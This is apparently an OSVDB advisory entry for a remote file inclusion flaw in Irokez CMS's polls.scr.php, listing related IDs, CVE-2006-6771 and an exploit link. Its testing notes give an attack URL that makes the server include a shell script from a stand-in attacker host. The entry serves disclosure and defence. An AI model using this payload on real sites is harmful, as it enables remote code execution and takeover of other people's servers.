Irokez CMS scripts/polls.scr.php GLOBALS[PTH][classes] Variable Remote File Inclusion

2006-12-25T04:18:50
ID OSVDB:32460
Type osvdb
Reporter OSVDB
Modified 2006-12-25T04:18:50

Description

Manual Testing Notes

http://[target]/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://[attacker]/shell.php?

References:

Secunia Advisory ID: 23497
Related OSVDB ID: 32469
Related OSVDB ID: 32459
Related OSVDB ID: 32462
Related OSVDB ID: 32464
Related OSVDB ID: 32465
Related OSVDB ID: 32457
Related OSVDB ID: 32458
Related OSVDB ID: 32461
Related OSVDB ID: 32463
Related OSVDB ID: 32466
Related OSVDB ID: 32467
Related OSVDB ID: 32468
Generic Exploit URL: http://www.milw0rm.com/exploits/3007
FrSIRT Advisory: ADV-2006-5178
CVE-2006-6771
Bugtraq ID: 21769